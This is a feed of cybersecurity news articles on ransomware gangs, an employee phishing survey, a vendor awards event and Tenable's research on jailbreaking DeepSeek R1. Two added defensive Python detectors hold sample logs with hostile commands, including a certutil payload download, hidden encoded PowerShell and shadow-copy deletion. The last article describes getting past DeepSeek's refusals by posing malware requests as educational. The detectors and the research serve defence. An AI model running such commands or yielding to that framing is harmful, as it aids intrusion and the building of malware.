FunkSec, a growing ransomware group, released Wolfer, a tool designed to extract sensitive information from infected machines. It communicates with a Telegram bot to gather system details, Wi-Fi passwords, and more.

A ransomware gang adopting infostealers is bad news, especially as researchers recently found that cybercriminals are breaching U.S. national security organizations with infostealers costing as little as $10. Even high-security institutions such as the military and the FBI have had systems compromised, with the resulting access sold on the dark web.

Black Basta Gets Analyzed by AI

On February 11, 2025, the notorious Black Basta ransomware gang had its internal chats leaked. These chats contained over 200,000 Russian-language messages. Hudson Rock’s researchers created a chatbot called BlackBastaGPT to sift through the chat logs.

Insights revealed details about their profits, use of deepfake technology, and internal conflicts. The group’s leader emphasized avoiding detection by using built-in system tools, a tactic known as “living off the land.”
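To make “living off the land” concrete, here is an added detection example (not from Bitdefender, Hudson Rock or the leaked chats) that flags suspicious use of built-in Windows tools in process-creation logs. The log format, rule set and sample events are constructed for the example; the patterns cover the abuses that show up most often in ransomware intrusions (certutil downloads, encoded PowerShell, shadow-copy deletion, remote process creation via WMIC) plus one structural rule, an Office application spawning a script host.

```python
"""Flag living-off-the-land (LOTL) activity in process-creation logs.

Added example for this article; it is not from Bitdefender, Hudson Rock or the
leaked Black Basta chats. The log format is a constructed, simplified one:
"<timestamp>|<host>|<user>|<parent image>|<image path>|<command line>".
"""
import re
from dataclasses import dataclass

# Built-in Windows tools paired with command-line patterns that are rarely
# legitimate on a workstation. All patterns are matched case-insensitively.
LOTL_RULES = [
    ("certutil download", r"certutil(\.exe)?\s.*-urlcache\b.*\s-f\s"),
    ("certutil base64 decode", r"certutil(\.exe)?\s.*-decode\b"),
    ("mshta remote payload", r"mshta(\.exe)?\s+https?://"),
    ("regsvr32 remote scriptlet", r"regsvr32(\.exe)?\s.*/i:https?://"),
    ("powershell encoded command", r"powershell(\.exe)?\s.*\s-(e|ec|enc|encodedcommand)\s"),
    ("powershell web download", r"powershell(\.exe)?\s.*(downloadstring|downloadfile|invoke-webrequest|\biwr\b)"),
    ("bitsadmin transfer", r"bitsadmin(\.exe)?\s.*/transfer\b"),
    ("wmic remote process create", r"wmic(\.exe)?\s.*/node:.*process\s+call\s+create"),
    ("vssadmin shadow deletion", r"vssadmin(\.exe)?\s.*delete\s+shadows"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in LOTL_RULES]

# A script host spawned by an Office application is suspicious regardless of
# its arguments: that is how macro-laden lures usually start.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}


@dataclass
class ProcessEvent:
    ts: str
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_line(line):
    parts = line.rstrip("\n").split("|", 5)
    return ProcessEvent(*parts) if len(parts) == 6 else None


def match_rules(event):
    hits = [name for name, rx in COMPILED if rx.search(event.cmdline)]
    if basename(event.parent) in OFFICE_PARENTS and basename(event.image) in SCRIPT_HOSTS:
        hits.append("office app spawned script host")
    return hits


def scan(lines):
    """Return one finding per event that matched at least one rule."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        hits = match_rules(ev)
        if hits:
            findings.append({"ts": ev.ts, "host": ev.host, "user": ev.user,
                             "image": basename(ev.image), "rules": hits})
    return findings


# Constructed sample: four of the six events should fire.
SAMPLE_LOG = r"""
2025-02-12T09:14:03Z|WS-041|corp\jdoe|explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\jdoe\notes.txt
2025-02-12T09:15:10Z|WS-041|corp\jdoe|cmd.exe|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://203.0.113.7/upd.dat C:\Users\Public\upd.dat
2025-02-12T09:16:22Z|WS-041|corp\jdoe|WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A
2025-02-12T09:20:01Z|SRV-FS01|corp\svc_backup|services.exe|C:\Windows\System32\vssadmin.exe|vssadmin.exe delete shadows /all /quiet
2025-02-12T09:21:45Z|WS-052|corp\asmith|explorer.exe|C:\Windows\System32\certutil.exe|certutil.exe -verify C:\Users\asmith\vendor.cer
2025-02-12T09:30:00Z|WS-052|corp\asmith|cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic /node:SRV-FS01 process call create "cmd /c whoami"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.strip().splitlines()):
        print(f'{f["ts"]} {f["host"]:9} {f["user"]:16} {f["image"]:15} {", ".join(f["rules"])}')
```

Note the deliberately benign certutil -verify event: matching on the binary name alone would flood an analyst with false positives, which is exactly why LOTL works for attackers. The rules key on argument patterns and parent-child relationships instead.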

Ghost Ransomware Under Scrutiny

A joint advisory from CISA and the FBI highlighted Ghost (also known as Cring), a China-based ransomware operation that exploits older vulnerabilities for which patches exist but have not been applied. Recommendations include patching affected software, segmenting networks, and backing up data regularly.

Akira’s Webcam Hack

The Akira ransomware gang found a creative way to bypass security controls: it hijacked a victim’s webcam. Because the device ran Linux and was not closely monitored, it became an ideal launchpad for encrypting files across the network undetected.
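As an added example (not from Bitdefender or the Akira investigation), the following script shows one way a file server’s audit log could have caught such a device: it counts extension-changing renames per client inside a sliding window and applies a much lower threshold to clients outside the subnets that are expected to touch the share. The audit format, address ranges and sample lines are all constructed.

```python
"""Spot mass file encryption over SMB coming from an unexpected host.

Added example for this article; it is not Bitdefender's or the Akira case
data. The file-server audit format is constructed:
"<timestamp>|<client ip>|<op>|<path>[|<new path>]". The address ranges that
count as expected clients are assumptions for the sample network.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress
import os

# Assumed: workstations and admin jump hosts are the only hosts that should
# write to the share. Anything else (a camera, a printer, an appliance) is an
# unexpected source and gets a much lower alert threshold.
EXPECTED_CLIENTS = [ipaddress.ip_network("10.10.0.0/16"),
                    ipaddress.ip_network("10.20.0.0/24")]
WINDOW_SECONDS = 60
RENAME_THRESHOLD = 20          # extension-changing renames per window, any host
UNEXPECTED_THRESHOLD = 5       # same, for hosts outside EXPECTED_CLIENTS


def parse(line):
    parts = line.strip().split("|")
    if len(parts) < 4:
        return None
    return {"ts": datetime.fromisoformat(parts[0]),
            "ip": ipaddress.ip_address(parts[1]),
            "op": parts[2],
            "path": parts[3],
            "new": parts[4] if len(parts) > 4 else None}


def extension_changed(old, new):
    return os.path.splitext(old)[1].lower() != os.path.splitext(new)[1].lower()


def peak_in_window(times, window):
    """Largest number of events falling inside any `window`-second span."""
    times = sorted(times)
    peak, j = 0, 0
    for i, t in enumerate(times):
        while (t - times[j]).total_seconds() > window:
            j += 1
        peak = max(peak, i - j + 1)
    return peak


def analyze(lines):
    renames = defaultdict(list)       # client ip -> timestamps
    for line in lines:
        ev = parse(line)
        if ev is None or ev["op"] != "RENAME" or ev["new"] is None:
            continue
        if extension_changed(ev["path"], ev["new"]):
            renames[ev["ip"]].append(ev["ts"])
    alerts = []
    for ip, times in renames.items():
        peak = peak_in_window(times, WINDOW_SECONDS)
        unexpected = not any(ip in net for net in EXPECTED_CLIENTS)
        threshold = UNEXPECTED_THRESHOLD if unexpected else RENAME_THRESHOLD
        if peak >= threshold:
            alerts.append({"ip": str(ip), "peak_renames": peak,
                           "unexpected_source": unexpected,
                           "severity": "critical" if unexpected else "high"})
    return alerts


def build_sample():
    """Constructed audit lines: a normal workstation, an unmonitored Linux
    device on a non-client subnet encrypting a share, and a noisy workstation."""
    base = datetime(2025, 2, 20, 3, 12, 0)
    lines = []
    # 10.10.5.23: three save-as renames (.tmp -> .docx), normal editing
    for i in range(3):
        ts = (base + timedelta(seconds=15 * i)).isoformat()
        lines.append(f"{ts}|10.10.5.23|RENAME|\\\\fs01\\finance\\q{i}.tmp|\\\\fs01\\finance\\q{i}.docx")
    # 192.168.77.9: twelve renames to .locked in 22 seconds from a camera VLAN
    for i in range(12):
        ts = (base + timedelta(seconds=30 + 2 * i)).isoformat()
        lines.append(f"{ts}|192.168.77.9|RENAME|\\\\fs01\\finance\\inv{i}.xlsx|\\\\fs01\\finance\\inv{i}.xlsx.locked")
    # 10.20.0.5: an admin writing a file, not a rename, so it is ignored
    lines.append(f"{(base + timedelta(seconds=40)).isoformat()}|10.20.0.5|WRITE|\\\\fs01\\it\\notes.txt")
    # 10.10.8.8: 25 extension-changing renames in 24 seconds, high even for a workstation
    for i in range(25):
        ts = (base + timedelta(seconds=100 + i)).isoformat()
        lines.append(f"{ts}|10.10.8.8|RENAME|\\\\fs01\\hr\\f{i}.pdf|\\\\fs01\\hr\\f{i}.pdf.locked")
    return lines


if __name__ == "__main__":
    for alert in analyze(build_sample()):
        print(alert)
```

The design choice worth copying is the asymmetric threshold: an endpoint agent would never see the webcam, but the file server sees every client, and a device that should not be writing to the share at all needs only a handful of renames to justify an alert.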

Stephen Kowski, Field CTO at SlashNext Email Security+ in Pleasanton, Calif., commented on the findings, emphasising the need to fix vulnerabilities and improve threat detection and response capabilities.

“We expect ransomware attacks to continue increasing this year, especially targeting healthcare, manufacturing, critical infrastructure, and supply chains. High-profile incidents in 2024 highlight the ongoing vulnerabilities,” warned Kowski. “To combat this, organizations need to focus on strengthening email security, implementing zero-trust architectures, and improving threat detection and response capabilities.”

Top 10 Countries Most Targeted by Ransomware Gangs

The United States, Canada, the UK, Germany, and other developed nations remain the biggest targets of ransomware groups. These countries are attractive targets because of their dense deployment of connected edge devices, cloud infrastructure, and high-value business data.

In total, these are the top 10 countries most targeted by ransomware gangs:

  1. USA
  2. Canada
  3. The UK
  4. Germany
  5. France
  6. Australia
  7. Brazil
  8. Mexico
  9. Italy
  10. Sweden

For those looking to understand the full scope of modern ransomware operations and how to fight back, Bitdefender has published a comprehensive whitepaper detailing current attack methods and defence strategies. You can access it here.


KnowBe4 research reveals a confidence gap in cybersecurity, putting organisations at risk


KnowBe4, a cybersecurity platform that addresses human risk management, has released new research indicating that while 86% of employees believe they can confidently identify phishing emails, nearly half have fallen for scams. The study, which surveyed professionals across the UK, USA, Germany, France, the Netherlands, and South Africa, reveals a widening gap between confidence and competence in identifying cyber threats.

Notably, South Africa leads with both the highest confidence levels and the highest scam victimization rate, suggesting that misplaced confidence can create a false sense of security, leaving employees more susceptible to advanced cyber threats. Beyond training, the report highlights the importance of fostering a transparent security culture. While 56% of employees feel “very comfortable” reporting security concerns, 1 in 10 still hesitate due to fear or uncertainty.

Key findings from the survey included:

  • 86% of employees believe they can confidently identify phishing emails.
  • 24% have fallen for phishing attacks.
  • 12% have been tricked by deepfake scams.
  • 68% of South African employees reported falling for scams, the highest victimisation rate.

“Overconfidence fosters a dangerous blind spot—employees assume they are scam-savvy when, in reality, cybercriminals can exploit more than 30 susceptibility factors, including psychological and cognitive biases, situational awareness gaps, behavioural tendencies, and even demographic traits,” said Anna Collard, SVP content strategy and evangelist, KnowBe4. “With phishing, AI-driven social engineering, and deepfake scams evolving rapidly, organisations must counteract misplaced confidence with hands-on, scenario-based training. True cyber resilience comes not from assumed knowledge but from continuous education, real-world testing, and an adaptive security mindset.”

The survey findings emphasize the critical need for personalised, relevant, and adaptive training that caters to employees’ individual needs while considering regional influences and evolving cyber tactics. Organisations that prioritise this approach will not only reduce risk but also cultivate a genuine security-first culture. In the battle against digital deception, the most dangerous mistake employees can make is assuming they are immune.

The report, “Security Approaches Around the Globe: The Confidence Gap,” is available for download here.

The post KnowBe4 research reveals a confidence gap in cybersecurity, putting organisations at risk appeared first on IT Security Guru.

FBI and CISA Urge Enabling 2FA to Counter Medusa Ransomware


FBI and CISA warn of Medusa ransomware attacks impacting critical infrastructure. Learn about Medusa’s tactics, prevention tips, and why paying ransoms is discouraged. 

A joint advisory by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) has detailed a particularly aggressive criminal operation: the Medusa ransomware gang.

According to the advisory (#StopRansomware: Medusa Ransomware), Medusa, a ransomware-as-a-service (RaaS) group first identified in June 2021, has become a serious threat to critical infrastructure sectors in the United States.

Authorities have identified a pattern of attacks affecting organizations across diverse sectors, including healthcare, education, law firms, insurance providers, technology companies, and manufacturers. Their victims include Bell Ambulance in Wisconsin, CPI Books, Customer Management Systems, and Heartland Health Center. The sheer number of victims, surpassing 300 as of December 2024, highlights the scope of this threat. 

The actors use several methods to gain initial access, including phishing and exploitation of unpatched software vulnerabilities (for example, the ScreenConnect authentication bypass CVE-2024-1709). Once inside a network, they rely on legitimate system administration tools to move laterally without drawing attention.

They run a double-extortion model: victims’ data is encrypted and rendered inaccessible, and the actors also threaten to publish stolen sensitive information if their demands are not met. This puts immense pressure on targeted organizations, pushing them to consider paying the ransom to prevent public disclosure of their data.

“Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to obtain initial access to potential victims. Potential payments between $100 USD and $1 million USD are offered to these affiliates with the opportunity to work exclusively for Medusa,” the advisory (PDF) warns.

Medusa uses a range of techniques to conceal its activities, such as remote access software to control compromised systems and encrypted scripts and tools that open hidden connections to its command-and-control servers, evading detection by security software.

A particularly concerning aspect of this operation is the aggressive nature of their extortion tactics. Victims are given a very short window of time to pay the ransom, often just two days. They are pressured through direct communication, and if they fail to comply, their stolen data is made available on darknet websites. There are even reports that paying the initial ransom might not guarantee the end of the ordeal, as further demands may follow.

In response to this growing threat, federal agencies have emphasized the need for regular software updates, reliable access controls, and multi-factor authentication. They also advise monitoring network activity for suspicious behaviour, limiting the use of Remote Desktop Protocol (RDP), and segmenting networks to contain any breach.

Moreover, users are urged to enable two-factor authentication (2FA) for webmail and VPNs as social engineering is a significant factor in these attacks. All organizations affected by the Medusa ransomware are requested to report the incidents to law enforcement and to avoid paying any ransom demands.


Check Point Software Celebrates Continued Partner Success at UK Partner Awards


Check Point® Software has announced the winners of its UK Partner Awards. The annual awards ceremony, which took place at One Moorgate Place on March 6th, 2025, celebrated the input of Check Point’s affiliate companies and the growing partner community across the UK.

The 2025 Check Point UK Partner Awards recognised the continued dedication of trusted UK partners over the past year and their commitment to helping organisations become more secure. A gala dinner was held to celebrate these successes, followed by the awards presentations. Mark Weir, Regional Director UK&I at Check Point Software, and Martin Rutterford, Channel Director for the UK & Ireland at Check Point Software, opened the event by reflecting on the company’s achievements over the past year. Charlotte Wilson, Head of Enterprise Sales at Check Point Software, joined esteemed comedian Tom Allen to present the awards.

Organisations of all sizes have faced unprecedented challenges when it comes to cyber security over the past year. Check Point’s State of Cyber Security 2025 report revealed that there’s been a worrying 44% increase in global cyberattacks year on year, with a 58% surge in infostealer attacks, pointing to a maturing threat ecosystem. This, compounded by the rising threat faced by AI-fuelled attacks, increased targeting of Edge devices, and complexity of ransomware, has presented organisations with a challenging cyber landscape to manage thoroughly, especially alongside maintaining innovation and business growth. Check Point’s partners help organisations manage the rising risks with trust and ease, making the business ecosystem safer for all.

The Check Point UK Partner Awards recognise the exceptional accomplishments of regional industry leaders in tackling the critical cyber security issues their clients face. These awards celebrate the commitment, effort, and triumphs of key figures in the cyber security field who are working relentlessly to safeguard businesses and individuals in the face of rising threats. Channel partners are indispensable as an extension of these organisations, assisting in the development of resilience and the reinforcement of cyber security, all without requiring internal Security Operations Centres (SOCs).

The winners of the 2025 UK Partner Awards were: 

  • Marketplace Partner of the Year: Computacenter
  • Quantum Partner of the Year: BT
  • Harmony Partner of the Year: Softcat
  • Cloud Partner of the Year: Computacenter
  • Infinity Partner of the Year: Bytes
  • Distribution Partner of the Year: Westcon
  • Rising Star Partner of the Year: Systal
  • New Logo Partner of the Year: Softcat
  • Project of the Year: World Wide Technology
  • Technical Champion of the Year: John Tammaro, SEP2
  • Sales Champion of the Year: Becky Clayton, Westcon
  • Marketing Champion of the Year: Daniela Miccardi, Bytes
  • Check Point Champion of the Year: Michael Lenham, Bytes
  • Global Systems Integrator of the Year: BT
  • Partner of the Year: BT

“Every day, our partners are on the frontlines, helping businesses stay one step ahead of increasingly sophisticated cyber threats,” said Mark Weir, Regional Director UK&I at Check Point Software. “ In a year where AI-fuelled attacks and targeted ransomware campaigns have surged, their dedication, expertise, and innovation have been crucial in protecting organisations across the UK. These awards are not just about recognising success—they’re about celebrating the relentless commitment of our partners to keeping businesses secure, resilient, and future-ready. We’re incredibly proud to work alongside such a talented and driven network and look forward to another year of growth and shared victories.”

At the ceremony, over £2,000 was raised for LupusUK.

The post Check Point Software Celebrates Continued Partner Success at UK Partner Awards appeared first on IT Security Guru.

AI Chatbot DeepSeek R1 Can Be Manipulated to Create Malware


Tenable Research reveals that AI chatbot DeepSeek R1 can be manipulated to generate keyloggers and ransomware code. While not fully autonomous, it provides a playground for cybercriminals to refine and exploit its capabilities for malicious purposes.

A new analysis from cybersecurity firm Tenable Research reveals that the open-source AI chatbot DeepSeek R1 can be manipulated to generate malicious software, including keyloggers and ransomware.

Tenable’s research team set out to assess DeepSeek’s ability to create harmful code. They focused on two common types of malware: keyloggers, which secretly record keystrokes, and ransomware, which encrypts files and demands payment for their release.

While the chatbot does not produce fully functional malware out of the box, and needed guidance and manual code corrections before it produced a working keylogger, the research suggests it could lower the barrier to entry for cybercriminals.

Initially, like other large language models (LLMs), DeepSeek adhered to its built-in guidelines and refused direct requests to write malware. However, the Tenable researchers used a jailbreak technique, framing the request as being for educational purposes, to bypass these restrictions.

The researchers leveraged a key part of DeepSeek’s functionality: its “chain-of-thought” (CoT) capability. This feature allows the AI to explain its reasoning process step-by-step, much like someone thinking aloud while solving a problem. By observing DeepSeek’s CoT, researchers gained insights into how the AI approached malware development and even recognised the need for stealth techniques to avoid detection.

DeepSeek Building Keylogger

When tasked with building a keylogger, DeepSeek first outlined a plan and then generated C++ code. This initial code was flawed and contained several errors that the AI itself could not fix. However, with a few manual code adjustments by the researchers, the keylogger became functional, successfully logging keystrokes to a file.

Taking it a step further, the researchers prompted DeepSeek to help enhance the malware by hiding the log file and encrypting its contents, which it managed to provide code for, again requiring minor human correction.

This screenshot displays the keylogger created by DeepSeek running in the Task Manager, alongside the log file it generated. (Credit: Tenable Research)

DeepSeek Building Ransomware

The experiment with ransomware followed a similar pattern. DeepSeek laid out its strategy for creating file-encrypting malware. It produced several code samples designed to perform this function, but none of these initial versions would compile without manual editing.

Nevertheless, after some tweaking by the Tenable team, some of the ransomware samples were made operational. These functional samples included features for finding and encrypting files, a method to ensure the malware runs automatically when the system starts, and even a pop-up message informing the victim about the encryption.

DeepSeek Struggled with Complex Malicious Tasks

While DeepSeek demonstrated an ability to generate the basic building blocks of malware, Tenable’s findings highlight that it’s far from a push-button solution for cybercriminals. Creating effective malware still requires technical knowledge to guide the AI and debug the resulting code. For instance, DeepSeek struggled with more complex tasks like making the malware process invisible to the system’s task manager.

However, despite these limitations, Tenable researchers believe that access to tools like DeepSeek could accelerate malware development activities. The AI can provide a significant head start, offering code snippets and outlining necessary steps, which could be particularly helpful for individuals with limited coding experience looking to engage in cybercrime.

“DeepSeek can create the basic structure for malware,” explains Tenable’s technical report shared with Hackread.com ahead of its publishing on Thursday. “However, it is not capable of doing so without additional prompt engineering as well as manual code editing for more advanced features.” The AI struggled with more complex tasks like completely hiding the malware’s presence from system monitoring tools.

Trey Ford, Chief Information Security Officer at Bugcrowd, a San Francisco, Calif.-based crowdsourced cybersecurity company, commented on the findings, noting that AI will aid both good and bad actors and that defenders should focus on making attacks more costly by hardening endpoints rather than expecting EDR to stop every threat.

“Criminals are going to be criminals – and they’re going to use every tool and technique available to them. GenAI-assisted development is going to enable a new generation of developers – for altruistic and malicious efforts alike,” said Ford.

“As a reminder, the EDR market is explicitly endpoint DETECTION and RESPONSE – they’re not intended to disrupt all attacks. Ultimately, we need to do what we can to drive up the cost of these campaigns by making endpoints harder to exploit – pointedly they need to be hardened to CIS 1 or 2 benchmarks,” he explained.

